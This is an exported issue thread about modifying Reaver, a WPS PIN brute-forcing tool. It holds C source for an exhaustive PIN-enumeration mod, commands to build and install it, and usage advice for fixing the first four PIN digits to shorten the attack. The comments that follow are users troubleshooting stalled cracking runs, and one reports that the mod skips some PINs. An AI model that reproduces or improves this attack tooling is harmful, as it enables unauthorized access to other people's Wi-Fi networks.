char *build_wps_pin()
{
    char *key = NULL, *pin = NULL;
    int pin_len = PIN_SIZE + 1;

    pin = malloc(pin_len);
    key = malloc(pin_len);
    if(pin && key)
    {
        memset(key, 0, pin_len);
        memset(pin, 0, pin_len);

        /* Generate a 7-digit pin: first half from the p1 table, second half
         * from the p2 table at the exhaustive index */
        snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));

        /* Append last digit (enumerated, not the checksum) */
        snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

        free(key);

        /* Advance the state for the next call */
        if(exhaustive_last_digit == 0)
        {
            if(exhaustive_index == 999)
            {
                cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
                /* Clean up and get out */
                globule_deinit();
                exit(EXIT_FAILURE);
            }
            exhaustive_index++;
            exhaustive_last_digit = 9;
        }
        else
        {
            exhaustive_last_digit--;
        }
    }

    return pin;
}

/* EXHAUSTIVE MOD. end */

-the current reaver has to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-the modified reaver has to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the pin's first 4 digits.
if you don't specify these 4 digits the worst case will take at least 10 years 
(3 sec/pin * 10^8 pins). 
using the right 4 digits the worst case will take at least 10 hours (3 sec/pin * 
10^4).

to reinstall the original reaver:
substitute the modified pins.c with the original pins.c that you kept safe 
somewhere.
uninstall and install with the same commands as above.

Original comment by stefano....@gmail.com on 22 Oct 2012 at 8:57

GoogleCodeExporter commented 9 years ago
Sorry about my English.. 
I have the %99.9 problem too with reaver 1.4 [it starts at %90] (first four digits 1234.) 
But when I tried reaver 1.3 [it starts at %0.0] it got stuck at 90.9 with the 
same pin->(first four digits 5323) and I am trying to find a solution..
STEFANO I did your solution alternately. But 'reaver' didn't open after I wrote 
these to the console " 
cd /root/reaver-wps-read-only/src
./configure
make distclean  
cd /root/reaver-wps-read-only/src
./configure
make
make install  
"
The second question: Are we sure that the stuck pin at %99 (1234....) has the correct 
first four digits? 
Finally: in the pins.c file, do we erase everything inside and copy your things, is 
that right?? Help pls, I am a bit of a noob. :) Thanks a lot!

Original comment by cyberfa3...@gmail.com on 24 Oct 2012 at 4:37

GoogleCodeExporter commented 9 years ago
Stefano I solved my 2 problems :) and with the pinned reaver 1.3 (modified) it's 
at about %25 now. But I am still not sure that the stuck pin's first four digits (1234) 
are correct :((

Original comment by cyberfa3...@gmail.com on 25 Oct 2012 at 4:48

GoogleCodeExporter commented 9 years ago
reaver 1.4 stuck at %99 1234abcd, reaver 1.3 stuck at different pins 5041klmn. What 
can I do? Is there no solution for me?!   

Original comment by cyberfa3...@gmail.com on 28 Oct 2012 at 2:51

GoogleCodeExporter commented 9 years ago
same problem
same pin 12349982

Original comment by sergey...@gmail.com on 29 Jan 2013 at 3:05

GoogleCodeExporter commented 9 years ago
Guys, what can I do about being stuck at %90.90?

Original comment by s.wra...@gmail.com on 12 Apr 2013 at 9:56

GoogleCodeExporter commented 9 years ago
Stefano,
I'm not sure that the mod in post #41 is correct.

I tried it, without the option -p (my PC is faster than 3 sec/pin), and both 
pin halves - the first 4 digits and the second 4 digits - increased by 1.

ex:
00010001
00020002.

So not all pins are tried.

I'm not a programmer, so could you correct the algorithm?

Original comment by alfdi...@gmail.com on 7 May 2013 at 12:54

GoogleCodeExporter commented 9 years ago
try wpspingenerator

Original comment by rnaa...@gmail.com on 11 May 2013 at 1:54